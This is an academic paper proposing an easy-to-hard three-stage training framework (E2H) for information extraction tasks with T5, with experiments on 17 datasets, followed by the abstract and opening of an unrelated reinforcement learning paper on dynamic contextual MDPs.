Traditionally, IE has been approached with specialized models that are designed to handle specific IE tasks. For example, NER is often formulated as a sequence labeling Ma and Hovy (2016); Xu et al. (2021) or span-based classification Wang et al. (2020) problem. The more complex RE or EE task is usually solved with pipeline approaches that split the original task into several sequential subtasks and design specific models for each subtask Subburathinam et al. (2019); Yang et al. (2019); Peng et al. (2020). These models often require extensive task-specific knowledge to design dedicated model architectures and thus suffer from poor generalization. Recently, motivated by pre-trained generative models such as T5 Raffel et al. (2020) that handle multiple tasks with the unified text-to-text format, there has been a shift towards the use of unified models for IE as well, which can tackle all IE tasks with a single model structure. For example, TANL Paolini et al. (2021) tackles various IE tasks with a text-to-text generative model by framing them as translation between augmented natural languages. UIE Lu et al. (2022) models heterogeneous IE structures into a uniform representation via a structural extraction language. Despite the success of existing unified models on various IE tasks, they typically adopt a one-stage learning paradigm, i.e., directly learning to predict the target structure given the input text. In contrast, humans often learn to tackle a task in an easy-to-hard manner. They learn basic concepts or skills before solving more complex problems and often tackle harder examples to gain a better understanding of the problem. Taking the RE task as an example, it aims to extract relational triplets, where each triplet consists of a head entity, a relation, and a tail entity. To tackle it, humans first learn some basic skills, such as identifying entities, recognizing relations, and associating entities and relations, before extracting complex relational triplets. This process facilitates humans to learn meaningful substructures and the dependencies among them. Moreover, in practical scenarios, humans usually encounter harder cases, i.e., long input context of multiple sentences containing more entities and relations. By solving hard cases, humans improve their understanding of the task and problem-solving skills. By comparison, models are only trained with the provided training data. The gap between the model and human learning strategies hinders IE models from further development. To bridge the gap, we propose an **easy-to-hard (E2H)** learning framework for IE tasks in this paper. E2H mimics the human learning procedure to learn each IE task in stages, i.e., the easy stage, the hard stage, and the main stage. The easy stage aims to help the model acquire basic skills of the task, and the hard stage aims to assist the model in handling broad-range variations of the task via training the model with diverse and harder data. Finally, the main stage focuses on the main task at hand for training. Thus an immediate question is how to prepare the data with different levels of difficulty for the easy and hard stages. It is labor-intensive and challenging to construct such data manually. In this work, we attempt only to leverage the existing data of the main task for constructing the data. Specifically, for the easy stage, we observe that the target IE structure often has meaningful substructures. Therefore, we identify several basic skills for each task according to the substructures of its target structure. Returning to the RE example, the skills can be recognizing the entities, relations, and dependencies between them. We can automatically construct training data for learning these skills by modifying the input prompt and decomposing the target structure of the main task. For the hard stage, we combine two training instances of the main task to build a harder training instance by concatenating their input texts to form the new text and their targets to build the new target. The new instance contains more entities, relations, and complicated contexts, making it harder than the original instances. Through these two novel construction strategies, we can reduce much human effort to obtain the data for different stages. To summarize, our contributions are three-fold: (1) We propose a unified easy-to-hard (E2H) learning framework for IE tasks by imitating the human learning process; (2) We develop two novel strategies to build the easy and hard stages of our framework without using any additional resources; (3) We conduct comprehensive evaluations on 17 datasets across four IE tasks and achieve state-of-the-art results on 13 datasets. Notably, our E2H method consistently outperforms the one-stage learning counterpart by introducing two extra learning stages with an average increase of 0.38, 2.96, 1.33, and 1.39 absolute points on the NER, RE, EE, and ABSA tasks, respectively. ## 2 Task Definition This paper investigates four common IE tasks, i.e., NER, RE, EE, and ABSA. In this section, we provide formal definitions of these tasks. Detailed examples of these tasks are in Appendix A.3. Named Entity Recognition (NER)Given an input text \(T\), the task is to identify and classify entities in \(T\) into predefined categories, i.e., extract \(\{(e_{i},c_{i})\}\), where \(e_{i}\) is the \(i\)-th entity, which is a continuous text span in \(T\), \(c_{i}\in\mathcal{C}\) is its category, and \(\mathcal{C}\) is the entity category set. Relation Extraction (RE)Given an input text \(T\), RE is to identify a set of (head entity, relation, tail entity) triplets, i.e., extract \(\{((e_{i}^{h},c_{i}^{h}),r_{i},(e_{i}^{t},c_{i}^{t}))\}\), where the superscripts \(h\) and \(t\) denote the head and tail entities, \(r_{i}\in\mathcal{R}\) is the \(i\)-th relation, and \(\mathcal{R}\) is the relation set. Event Extraction (EE)Given an input text \(T\), the task is to identify a set of events where each event consists of an event trigger and a set of corresponding arguments, i.e., extract \(\{((e_{i}^{tri},c_{i}^{tri}),(e_{i}^{arg_{1}},c_{i}^{arg_{1}}),\cdots,(e_{i}^{ arg_{m}},c_{i}^{arg_{m}}))\}\), where \(e_{i}^{tri}\) is the \(i\)-th trigger, which is a continuous text span in \(T\), \(c_{i}^{tri}\in\mathcal{C}_{event}\) is its category, \(e_{i}^{arg_{j}}\) is the \(j\)-th argument of the \(i\)-th event, which is also a continuous text span in \(T\), \(c_{i}^{arg_{j}}\in\mathcal{C}_{event}\) is its category, and \(\mathcal{C}_{event}\) consists of all event and argument categories. Aspect-based Sentiment Analysis (ABSA)There are four essential elements in ABSA, namely aspect category \(c\), aspect term \(a\), opinion term \(o\), and sentiment polarity \(p\). We focus on the aspect sentiment triplet extraction (ASTE) task Peng et al. (2020) and the aspect sentiment quad prediction (ASQP) task Zhang et al. (2021) given their popularity. Given an input text \(T\), the ASTE task is to identify a set of \(\{(a_{i},o_{i},p_{i})\}\) triplets, and the ASQP task is to identify a set of \(\{(c_{i},a_{i},o_{i},p_{i})\}\) quadruplets, where \(c_{i}\in\mathcal{C}_{absa}\) is \(i\)-th aspect category, \(a_{i}\) is \(i\)-th aspect term, \(o_{i}\) is \(i\)-th opinion term, both \(a_{i}\) and \(o_{i}\) are continuous spans in \(T\), \(p_{i}\in\{\text{positive, negative, neutral}\}\) is \(i\)-th sentiment polarity, and \(\mathcal{C}_{absa}\) is the aspect category set. ## 3 Our E2H Framework Our proposed easy-to-hard (E2H) framework consists of three sequential stages: the easy stage, the hard stage, and the main stage. In this section, we first introduce our text-to-structure formulation for facilitating three-stage learning in a unified framework. Next, we will describe how to realize the easy and hard stages. Finally, we will discuss the main stage as well as the detailed training and inference process of our framework. ### Unified Text-to-Structure Formulation Similar to UIE Lu et al. (2022), we formulate NER, RE, EE, and ABSA as text-to-structure generation problems, which allows us to use a single model to tackle multiple tasks. Given a text \(T\) and its corresponding prompt \(P\), we aim to generate the target IE structure \(S\) with an encoder-decoder model \(M:(P,T)\to S\). To facilitate the learning of different stages, we design the prompt \(P\) containing three types of information: Hint, Constraint, and Schema. Hint guides the model on what elements should be extracted, Constraint indicates specific constraints for the task, and Schema provides necessary information such as the possible relation set for the extraction. With these three types of information, the prompt is able to connect the learning process in different stages. Taking the RE task as an example, as depicted in Figure 1, Hint consists of one or both of an entity hint and a relation hint. The entity hint, represented by the special token [HE], guides the model to extract entities, and the relation hint, represented by the special token [HR], guides the model to extract relations. The use of both hints guides the model to extract both entity and relation information, in the form of (head entity, relation, tail entity) triplets. Constraint is a specific entity or relation, which limits the target structure to be related to that entity or relation. Lastly, Schema contains pre-defined entity categories or relations or both of them, depending on the information that needs to be extracted. It provides essential information for identifying entities and relations in a text. ### The Easy Stage The goal of the easy stage is to enable the model to learn basic skills that will aid in tackling the main task. To achieve this, we identify several skills for each task and automatically construct the training Figure 1: Overview of E2H consisting of three stages, i.e., the easy stage, the hard stage, and the main stage. We highlight Hint in red, Constraint in brown, and Schema in blue. data for them based on the data of the main task. Table 1 presents the basic skills of NER, RE, EE, ASTE, and ASQP. We design each skill to be a sub-task of the main task according to its target structure. These skills are more fundamental and well-defined. Combining these skills gives the model a whole picture of how to tackle the main task. For example, the RE task has four skills. Skill\({}_{1}\) and Skill\({}_{3}\) help the model recognize substructures of the relational triplet, i.e., the entity and relation, respectively, and Skill\({}_{2}\) and Skill\({}_{4}\) help the model learn the dependencies between these substructures. To construct the training data for each skill, we modify the input and target of the main task's training data. Specifically, the input text is the same for the skills and the main task, but the prompt is different. As shown in Figure 1, for the RE task, there is only [HE] in the hint of Skill\({}_{1}\) as it only extracts entities and only [HR] in the hint of Skill\({}_{3}\) as it only extracts relations. Both [HE] and [HR] are in the hints of Skill\({}_{2}\), Skill\({}_{4}\), and the main task because they extract (head entity, relation, tail entity) triplets. For Skill\({}_{2}\) and Skill\({}_{4}\), there is also a Constraint, i.e., a head entity or relation, which requires their targets to be triplets related to a specific head entity or relation. The schema of the RE task consists of both entity categories and relations. For a specific skill of RE, the schema only contains entity categories or relations. The target of each skill is a part of the target of the RE task. For Skill\({}_{1}\) and Skill\({}_{3}\), which extract a substructure of the relational triplet, we use the substructure as the target. For Skill\({}_{2}\) and Skill\({}_{4}\), we use the corresponding subset of triplets of the RE task as the target. ### The Hard Stage The hard stage aims to construct training examples that are harder than the original training examples of the main task to train the model. Intuitively, the training instance is harder if the input text contains more structural elements and more complicated contexts. To this end, we combine two training instances of the original task to construct a harder instance. Formally, given two training instances \((P,T_{1},S_{1})\) and \((P,T_{2},S_{2})\), we can construct a harder training instance \((P,T_{1}\circ T_{2},S_{1}\circ S_{2})\), where \(P\) is the prompt, \(T_{i}\) is the \(i\)-th text, \(S_{i}\) is the \(i\)-th target structure, and \(\circ\) denotes concatenation. An example is shown in the hard stage part of the RE task in Figure 1. The model has to process and understand the combined information from both instances, making it more challenging for the model to correctly extract the target structure. Let \(N\) denote the number of training examples of the original task. For each training example, we randomly sample \(M\) training examples whose target structures are not empty to construct \(M\) hard instances. This results in a total of \(N*M\) hard instances. This approach allows us to easily construct a large amount of diverse hard training data. \begin{table} \begin{tabular}{l l} \hline \hline **Task** & **Basic Skills** \\ \hline NER & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of entity categories \(\{c_{i}\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and an entity category constraint \(c\rightarrow\) a set of entities of \(c\)\(\{(e_{i},c)\}\) \\ \hline \multirow{3}{*}{RE} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of entities \(\{(e_{i},c_{i})\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and a head entity constraint \((e^{h},c^{h})\rightarrow\) a set of relational triplets \(\{((e^{h},c^{h}),r_{i},e_{i}^{t})\}\) \\ & \(\textit{Skill}_{3}\): \(T\rightarrow\) a set of relations \(\{r_{i}\}\) \\ & \(\textit{Skill}_{4}\): \(T\) and a relation constraint \(r\rightarrow\) a set of relational triplets \(\{((e_{i}^{h},c_{i}^{h}),r,e_{i}^{t})\}\) \\ \hline \multirow{3}{*}{EE} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of event triggers \(\{(e_{i}^{tri},c_{i}^{tri})\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and a trigger constraint \((e^{tri},c^{tri})\rightarrow\) the event \(((e^{tri},c^{tri}),(e^{arg_{1}},c^{arg_{1}}),\cdots,(e^{arg_{m}},c^{arg_{m}}))\) \\ \hline \multirow{3}{*}{ASTE} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of aspect terms \(\{a_{i}\}\) and a set of opinion terms \(\{o_{i}\}\) \\ & \(\textit{Skill}_{2}\): \(T\) and an aspect term constraint \(a\rightarrow\) a set of triplets \(\{(a,o_{i},p_{i})\}\) \\ & \(\textit{Skill}_{3}\): \(T\rightarrow\) a set of sentiment polarities \(\{p_{i}\}\) \\ & \(\textit{Skill}_{4}\): \(T\) and a sentiment polarity constraint \(p\rightarrow\) a set of triplets \(\{(a_{i},o_{i},p)\}\) \\ \hline \multirow{3}{*}{ASQP} & \(\textit{Skill}_{1}\): \(T\rightarrow\) a set of aspect categories \(\{c_{i}\}\) \\ & \(\textit{Skill}_{2}\): \(T\rightarrow\) a set of (aspect category, aspect term) tuples \(\{(c_{i},a_{i})\}\) \\ & \(\textit{Skill}_{3}\): \(T\rightarrow\) a set of (aspect category, opinion term) tuples \(\{(c_{i},o_{i})\}\) \\ & \(\textit{Skill}_{4}\): \(T\rightarrow\) a set of (aspect category, sentiment polarity) tuples \(\{(c_{i},p_{i})\}\) \\ \hline \hline \end{tabular} \end{table} Table 1: Basic skills for NER, RE, EE, ASTE, and ASQP. We omit Hint and Schema for simplicity. Detailed examples are in Appendix A.3. ### The Main Stage After training the model in the easy and hard stages, we train the model with the main task in this stage. TrainingWe adopt the pre-trained sequence-to-sequence model T5 (Raffel et al., 2020) as the backbone of E2H. The model is trained with a maximum likelihood objective. Given the training example \((P,T,S)\), the loss function \(L_{\theta}\) is defined as \[L_{\theta}=-\sum_{i=1}^{n}\log P_{\theta}\left(S_{i}\mid S_{<i},P,T\right) \tag{1}\] where \(\theta\) is the model parameters, \(P\) is the prompt, \(T\) is the text, \(S\) is the target structure, and \(n\) is the length of \(S\). We train the model in the easy, hard, and main stages sequentially. For the easy stage, we adopt the weights of pre-trained T5 to initialize the model. For the hard and main stages, we initialize the model with the weights of the model trained in the previous stage. InferenceOnce the training process is complete, we use the model trained in the main stage to generate the target structure \(S\) for any given tuple of the prompt and text \((P,T)\). Although our training process has three stages, the inference is a one-stage process. The computational load is the same as that of the one-stage learning counterpart. ## 4 Experiments ### Experimental Setup DatasetsWe conduct experiments on 17 datasets across four IE tasks, i.e., NER, RE, EE, and ABSA. We evaluate the flat NER task with CoNLL03 (Tjong Kim Sang and De Meulder, 2003), and the nested NER task with ACE04-Ent (Mitchell et al., 2005) and ACE05-Ent (Walker et al., 2006). For RE, we experiment on CoNLL04 (Roth and Yih, 2004), ACE05-Rel (Walker et al., 2006), and SciERC (Luan et al., 2018). Regarding to EE, we use ACE05E, ACE05E+ (Walker et al., 2006), and CASIE (Satyapanich et al., 2020). As for ABSA, we consider the ASTE and ASQP tasks. For ASTE, we adopt four popular datasets, including Rest14, Laptop14, Rest15, and Rest16 provided by Xu et al. (2020). For ASQP, we use R-ACOS and L-ACOS provided by Cai et al. (2021), and Rest15 and Rest16 provided by Zhang et al. (2021). These ABSA datasets are derived from the datasets provided by the SemEval ABSA challenges (Pontiki et al., 2014, 2015, 2016), except L-ACOS which is collected from the Amazon Laptop domain. Statistics of these datasets are provided in Appendix A.1. EvaluationWe use Micro-F1 as the primary evaluation metric. For each experimental result, we report the average performance on three random seeds. For NER, RE, EE, and ASTE, we follow Lu et al. (2022) to use Entity F1, Relation Strict F1, Event Trigger F1 and Argument F1, and Sentiment Triplet F1 as the evaluation metrics and map the generated string-level extraction results to offset-level for evaluation. For ASQP, we follow Zhang et al. (2021) to use Sentiment Quad F1 to evaluate the model. A sentiment quad is correct if and only if the four elements are exactly the same as those in the gold sentiment quad. BaselinesWe divide our baselines into two categories: specialized models and unified models. Specialized models are designed for a particular IE task, while unified models are designed for general IE. For specialized models, we use state-of-the-art methods such as BARTNER (Yan et al., 2021) and DeBias (Zhang et al., 2022) for NER, UniRE (Wang et al., 2021) and PURE (Zhong and Chen, 2021) for RE, Text2Event (Lu et al., 2021) and DEGREE (Hsu et al., 2022) for EE, and PARAHPRASE (Zhang et al., 2021) and Seq2Path (Mao et al., 2022) for ABSA. For unified models, we use TANL (Paolini et al., 2021), UIE (Lu et al., 2022), and LasUIE (Fei et al., 2022) as baselines. To make a fair comparison with one-stage learning methods, we also build T5-base and T5-large baselines. We set their inputs and outputs the same as those of E2H and only train them in the main stage. Implementation DetailsE2H has two model sizes: E2H-base and E2H-large, which are initialized with pre-trained T5-base and T5-large models (Raffel et al., 2020), respectively. Other details are reported in Appendix A.2. ### Main Results We compare E2H with state-of-the-art specialized and unified models. Tables 2-4 report the experimental results on 17 datasets across four IE tasks. We have the following observations: (1) E2H is an effective framework for various IE tasks. E2H-large achieves new state-of-the-art results on 13 out of 17 datasets. (2) The proposed easy-to-hard three-stage learning method consistently outperforms the one-stage learning counterpart. E2H performs better than T5 on all the datasets for two model sizes, \begin{table} \begin{tabular}{l c c c c c c c c c c} \hline \hline \multirow{2}{*}{**Models**} & \multicolumn{6}{c}{ASETE} & \multicolumn{6}{c}{ASQP} \\ \cline{2-11} & Rest14 Laptop14 Rest15 Rest16 & Avg & R-ACOS L-ACOS Rest15 Rest15 Rest16 & Avg \\ \hline _Specialized Models_ & & & & & & & & \\ PARAPHIRASE (Zhang et al., 2021) & 72.03 & 61.13 & 62.56 & 71.70 & 66.86 & - & - & 46.93 & 57.93 & - \\ Seq2Path (Mao et al., 2022) & 75.52 & 64.82 & 65.88 & 72.87 & 69.77 & 58.41 & 42.97 & - & - \\ \hline _Unified Models_ & & & & & & & & & \\ UIE\({}^{*}\)(Lu et al., 2022) & 74.52 & 63.88 & 67.15 & 75.07 & 70.16 & - & - & - & - \\ T5-base (Raffel et al., 2020) & 72.11 & 63.06 & 66.27 & 72.24 & 68.42 & 59.26 & 43.12 & 48.24 & 58.92 & 52.39 \\ T5-large (Raffel et al., 2020) & 73.48 & 63.62 & 67.08 & 74.85 & 69.76 & 61.24 & 44.37 & 51.76 & 60.93 & 54.58 \\ E2H-base & 75.40 & 65.78 & 68.58 & 73.83 & 70.90 & 60.66 & 43.51 & 49.45 & 59.55 & 53.29 \\ E2H-large & **75.92** & **65.98** & **68.80** & **75.46** & **71.54** & **63.50** & **44.51** & **52.39** & **61.86** & **55.57** \\ \hline \hline \end{tabular} \end{table} Table 4: Experimental results on two ABSA tasks, including the ASTE task and the ASQP task. The best results are in bold and the second-best results are underlined. Models marked with \(*\) conduct large-scale continued pre-training with external resources. Except for T5-base and T5-large, the results of baselines are taken from their original papers. \begin{table} \begin{tabular}{l c c c c c c c c} \hline \hline \multirow{2}{*}{**Models**} & \multicolumn{6}{c}{NER} & \multicolumn{6}{c}{RE} \\ \cline{2-11} & CoNLL03 & ACE04-Ent ACE05-Ent & Avg & CoNLL04 ACE05-Rel & SciERC & Avg \\ \hline _Specialized Models_ & & & & & & & \\ BARTNER (Yan et al., 2021) & **93.24** & 86.84 & 84.74 & 88.27 & - & - & - & - \\ DeBias (Zhang et al., 2022) & 93.12 & 85.28 & 84.93 & 87.78 & - & - & - & - \\ UniRE (Wang et al., 2021) & - & - & - & - & - & 64.30 & 36.90 & - \\ PURE (Zhong and Chen, 2021) & - & - & - & - & - & - & 64.80 & 36.80 & - \\ \hline _Unified Models_ & & & & & & & & \\ TANL (Paolini et al., 2021) & 91.70 & - & 84.90 & - & 71.40 & 63.70 & - & - \\ UIE\({}^{*}\)(Lu et al., 2022) & 92.99 & 86.89 & 85.78 & 88.55 & 75.00 & 66.06 & 36.53 & 59.20 \\ LasUIE\({}^{*}\)(Fei et al., 2022) & 93.20 & 86.80 & 86.00 & **88.67** & 75.30 & **66.40** & - & - \\ T5-base (Raffel et al., 2020) & 91.72 & 85.60 & 84.16 & 87.16 & 69.58 & 62.91 & 33.13 & 55.20 \\ T5-large (Raffel et al., 2020) & 92.05 & 86.78 & 85.76 & 88.20 & 71.72 & 64.49 & 35.44 & 57.21 \\ E2H-base & 91.92 & 86.24 & 84.83 & 87.66 & 72.23 & 65.44 & 35.06 & 57.58 \\ E2H-large & 92.43 & **87.06** & **86.25** & 88.58 & **75.31** & 66.21 & **39.00** & **60.17** \\ \hline \hline \end{tabular} \end{table} Table 2: Experimental results on the NER and RE tasks. The best results are in bold and the second-best results are underlined. Models marked with \(*\) conduct large-scale continued pre-training with external resources. Except for T5-base and T5-large, the results of baselines are taken from their original papers. \begin{table} \begin{tabular}{l c c c c c c c c} \hline \hline \multirow{2}{*}{**Models**} & \multicolumn{6}{c}{ACE05-E} & \multicolumn{6}{c}{ACE05-E+} & \multicolumn{6}{c}{CASIE} & \multicolumn{6}{c}{Avg} \\ \cline{2-11} & Trig F1 & Argu F1 & Trig F1 & Argu F1 & Trig F1 & Argu F1 & Trig F1 & Argu F1 \\ \hline _Specialized Models_ & & & & & & & & \\ Text2Event (Lu et al., 2021) & 71.90 & 53.80 & 71.80 & 54.40 & - & - & - & - \\ DEGREE (Hsu et al., 2022) & **73.30** & **55.80** & 70.90 & **56.30** & - & - & - & - \\ \hline _Unified Models_ & & & & & & & & \\ TANL (Paolini et al., 2021) & 68.40 & 47.60 & - & - & - & - & - & - \\ UIE\({}^{*}\)(Lu et al., 2022) & - & - & 73.36 & 54.79 & 69.33 & 61.30 & - & - \\ T5-base (Raffel et al., 2020) & 68.19 & 49.68 & 69.68 & 50.65 & 68.40 & 60.19 & 68.76 & 53.51 \\ T5-large (Raffel et al., 2020) & 70.40 & 52.42 & 71.45 & 54.08 & 69.29 & 60.98 & 70.38 & 55.83 \\ E2H-base & 70.12 & 50.98 & 69.99 & 52.85 & 68.45 & 60.40 & 69.52 & 54.74 \\ E2H-large & 72.19 & 53.85 & **73.50** & 55.67 & **69.58** & **61.96** & **71.76** & **57.16** \\ \hline \hline \end{tabular} \end{table} Table 3: Experimental results on the EE task. The best results are in bold and the second-best results are underlined. Models marked with \(*\) conduct large-scale continued pre-training with external resources. Except for T5-base and T5-large, the results of baselines are taken from their original papers. and E2H-large obtains an average improvement of 0.38, 2.96, 1.33, and 1.39 absolute points over T5-large on the NER, RE, EE, and ABSA tasks, respectively. This demonstrates the strong generalization ability of our framework. (3) Without using any external resources, our method exhibits comparable or stronger performance than models with large-scale continued pre-training. Compared with UIE Lu et al. (2022), which is pre-trained with large-scale structured, unstructured, and parallel data, E2H-large achieves better performance on the RE, EE, and ASTE tasks and obtains comparable results on the NER task. (4) Easy-to-hard learning brings more benefits to complex tasks than simple tasks. Specifically, compared with the improvement on the NER task, which only extracts entities, the improvements of E2H over T5 are more significant on the other three tasks, which extract tuples with multiple elements. This shows that our method can help the model effectively capture the structural dependency of complex structures. ### Low-Resource Results Our experiments in low-resource scenarios show that E2H is particularly effective in situations where there is limited training data. As shown in Figure 2, by training on a fraction (1%, 5%, and 10%) of the original data1, we observe that E2H-base significantly outperforms T5-base on all datasets. For example, when there is only 5% of the training data, E2H-base obtains an average of 7.1, 12.0, 6.4, and 8.2 absolute points of improvement over T5-base on ACE04-Ent, ACE05-Rel, ACE05-E, and Rest14 respectively. This highlights the effectiveness of our easy-to-hard learning framework when data is scarce. On one hand, the easy stage facilitates the model to identify the substructures of the target structure and capture the dependencies among them, which are difficult when there is limited data. On the other hand, the hard stage provides diverse and harder data to help the model tackle broad-range variations of the task, which is especially important in low-source scenarios. Footnote 1: We repeat each experiment three times with different samples and report their averaged results. ## 5 More Analysis Analysis on different learning strategiesIn the main result table, we report the results of E2H trained with the easy\(\rightarrow\)hard\(\rightarrow\)main strategy, i.e., training the model in the easy, hard, and main stages sequentially. In this section, we investigate alternative learning strategies. Table 6 reports the results of T5-base models trained with different learning strategies on four datasets across four tasks. We have the following observations: (1) The easy\(\rightarrow\)hard\(\rightarrow\)main strategy is the best among the seven concerned strategies. It performs better than other strategies on all datasets. (2) Easy-to-hard multi-stage learning outperforms multi-task learning (i.e., easy+main+hard). When the easy, main, and hard parts of the training data are used, the easy\(\rightarrow\)hard\(\rightarrow\)main and easy\(\rightarrow\)main\(\rightarrow\)hard strategies show superiority over the easy+main+hard strategy on all datasets. This indicates that easy-to-hard multi-stage learning is essential to the model's performance. (3) Each stage is critical to our E2H framework. Removing any of the stages will reduce the performance of E2H. (4) In general, three-stage learning is better than two-stage learning, and they are better than one-stage learning. Figure 2: Results of E2H-base and T5-base in low-resource scenarios. \begin{table} \begin{tabular}{l c c c c} \hline \hline \multirow{2}{*}{**Models**} & NER & RE & EE & ABSA \\ & ACE04-Ent & ACE05-Rel & ACE05-E & Rest14 \\ \hline E2H-base & **86.24** & **65.44** & **50.98** & **75.40** \\ w/o Skill\({}_{1}\) & 85.91 & 64.28 & 50.85 & 74.33 \\ w/o Skill\({}_{2}\) & 86.13 & 64.05 & 49.89 & 74.98 \\ w/o Skill\({}_{3}\) & - & 63.74 & - & 75.14 \\ w/o Skill\({}_{4}\) & - & 64.00 & - & 74.88 \\ \hline \hline \end{tabular} \end{table} Table 5: Ablation results of E2H-base regarding different skills in the easy stage. Is each skill necessary in the easy stage?To quantify the contribution of each skill, we examine the performance of E2H-base after removing a basic skill for training in the easy stage. Ablation results on four datasets across four tasks are shown in Table 5. Removing any skill degrades the performance of E2H on the main task, indicating that recognizing substructures and the dependency between them is crucial to the model's performance. Does easy-to-hard learning improve the model's cross-domain generalization ability?To answer this question, we compare the performance of the E2H-base model and the T5-base model trained on a dataset on another dataset in a different domain of the same task. Table 7 reports the results of the cross-domain generalization performance of different models on two dataset pairs: CoNLL03\(\leftrightarrow\)ACE04-Ent of the NER task and Rest16\(\leftrightarrow\)Laptop14 of the ASTE task. E2H-base performs better than T5-base in all scenarios. This indicates that easy-to-hard learning can enhance the model's cross-domain generalization ability. ## 6 Related Work IE is a long-standing research area in natural language processing. Over the years, the paradigm for IE has undergone several transitions. Early approaches to IE focus on sequence labeling techniques McCallum and Li (2003); Ma and Hovy (2016); Zhang et al. (2018); Li et al. (2019); Zhang et al. (2021), in which each word in a text is assigned a label indicating its role in the extraction task. Span-based approaches Luan et al. (2019); Wang et al. (2020); Zhao et al. (2020); Xu et al. (2021); Zhou et al. (2022, 2023), which involve identifying spans in the text that correspond to the desired information, are later introduced for IE. MRC-based methods Du and Cardie (2020); Li et al. (2020); Mao et al. (2021); Xu et al. (2023) that frame the extraction task as a reading comprehension problem and generation-based methods Yan et al. (2021); Lu et al. (2021); Zhang et al. (2021) that generate the extracted information directly from the text have gained popularity in recent years for IE. They have been shown to be more effective and flexible. Most of these methods target a specific IE task. There have been some efforts to develop unified IE methods Paolini et al. (2021); Lu et al. (2022); Fei et al. (2022), which can unify various IE tasks with one framework. Our E2H framework, a unified IE framework, introduces a novel easy-to-hard learning paradigm for IE to reduce the gap between model and human learning. From the perspective of improving the learning process, E2H shares similar spirits with transfer learning Pan and Yang (2010), which uses the knowledge gained from solving one task to help solve another related task. By comparison, E2H learns basic skills specifically designed to assist with the target task. E2H is also related to curriculum learning Bengio et al. (2009); Wang et al. (2022) in its fundamental motivation of learning from easy to hard. Curriculum learning, inspired \begin{table} \begin{tabular}{l c c c c c c} \hline \hline \multirow{2}{*}{**Learning Strategy**} & \multirow{2}{*}{**Type**} & NER & RE & EE & ABSA & \multirow{2}{*}{Avg} \\ & & ACE04-Ent & ACE05-Rel & ACE05-E & Rest14 & \\ \hline easy\(\rightarrow\)hard\(\rightarrow\)main & three-stage & **86.24** & **65.44** & **50.98** & **75.40** & **69.52** \\ easy\(\rightarrow\)main\(\rightarrow\)hard & three-stage & 86.23 & 65.40 & 49.76 & 74.45 & 68.96 \\ easy+main+hard & multi-task & 86.10 & 64.46 & 49.16 & 73.94 & 68.42 \\ easy\(\rightarrow\)main & two-stage & 85.93 & 63.85 & 50.31 & 74.52 & 68.65 \\ hard\(\rightarrow\)main & two-stage & 85.99 & 64.41 & 49.26 & 74.67 & 68.58 \\ easy\(\rightarrow\)hard & two-stage & 86.18 & 65.35 & 46.69 & 75.34 & 68.39 \\ main & one-stage & 85.60 & 62.91 & 49.68 & 72.11 & 67.58 \\ \hline \hline \end{tabular} \end{table} Table 6: Experimental results of T5-base models trained with different learning strategies. The easy+main+hard strategy represents that the model is trained with the easy, main, and hard parts in a multi-task learning manner. The arrow \(\rightarrow\) indicates the order between different stages. \begin{table} \begin{tabular}{l c c} \hline \hline **Models** & CoNLL03\(\rightarrow\)ACE04-Ent & ACE04-Ent\(\rightarrow\)CoNLL03 \\ \hline T5-base & 19.54 & 17.45 \\ E2H-base & **19.71** & **30.08** \\ \hline **Models** & Rest16\(\rightarrow\)Laptop14 & Laptop14\(\rightarrow\)Rest16 \\ \hline T5-base & 42.37 & 60.50 \\ E2H-base & **44.86** & **62.32** \\ \hline \hline \end{tabular} \end{table} Table 7: Cross-domain generalization performance of E2H-base and T5-base. by the human learning process, presents examples starting from the easiest samples, then gradually introducing more complex ones. However, curriculum learning involves the intricate task of ordering instances based on their difficulty. This requires a reliable difficulty criterion or a ranking system, which can be challenging to define and often necessitates substantial human effort. In contrast, E2H emphasizes on mastering certain fundamental skills prior to tackling more intricate tasks, eliminating the requirement for a difficulty criterion. This approach can be particularly beneficial in scenarios where the target task requires a distinct set of skills, or when the learning setting does not naturally provide a straightforward measure of difficulty. ## 7 Conclusion This paper proposes an easy-to-hard learning framework consisting of the easy stage, the hard stage, and the main stage for IE. Two novel strategies are proposed to build the easy and hard parts of the framework to enable the learning process. Experimental results in both full and low-resource scenarios demonstrate the effectiveness of our framework and its superiority over one-stage learning methods. ## Limitations While the results have shown the effectiveness of our framework in IE without using any additional resources, we did not explore the potential enhancement by utilizing existing resources in the easy-to-hard learning process. On one hand, we can build the easy stage with the help of existing data of simpler tasks. On the other hand, the data of harder tasks can be used for the hard stage. To enhance the E2H framework via effectively using existing resources is an interesting and promising direction. Another limitation is that we did not extensively explore the possible skill sets for each task. Exploring more approaches to obtain the skill sets is also open for future research. We plan to investigate these possibilities in our future work.
2302.02061
Reinforcement Learning with History-Dependent Dynamic Contexts
We introduce Dynamic Contextual Markov Decision Processes (DCMDPs), a novel reinforcement learning framework for history-dependent environments that generalizes the contextual MDP framework to handle non-Markov environments, where contexts change over time. We consider special cases of the model, with a focus on logistic DCMDPs, which break the exponential dependence on history length by leveraging aggregation functions to determine context transitions. This special structure allows us to derive an upper-confidence-bound style algorithm for which we establish regret bounds. Motivated by our theoretical results, we introduce a practical model-based algorithm for logistic DCMDPs that plans in a latent space and uses optimism over history-dependent features. We demonstrate the efficacy of our approach on a recommendation task (using MovieLens data) where user behavior dynamics evolve in response to recommendations.
Guy Tennenholtz, Nadav Merlis, Lior Shani, Martin Mladenov, Craig Boutilier
2023-02-04T01:58:21Z
http://arxiv.org/abs/2302.02061v2
# Reinforcement Learning with History-Dependent Dynamic Contexts ###### Abstract We introduce _Dynamic Contextual Markov Decision Processes (DCMDPs)_, a novel reinforcement learning framework for history-dependent environments that generalizes the contextual MDP framework to handle non-Markov environments, where contexts change over time. We consider special cases of the model, with a focus on _logistic DCMDPs_, which break the exponential dependence on history length by leveraging aggregation functions to determine context transitions. This special structure allows us to derive an upper-confidence-bound style algorithm for which we establish regret bounds. Motivated by our theoretical results, we introduce a practical model-based algorithm for logistic DCMDPs that plans in a latent space and uses optimism over history-dependent features. We demonstrate the efficacy of our approach on a recommendation task (using MovieLens data) where user behavior dynamics evolve in response to recommendations. Machine Learning, ICML ## 1 Introduction Reinforcement learning (RL) is a paradigm in which an agent learns to act in an environment to maximize long-term reward. RL has been applied to numerous domains, including recommender systems, 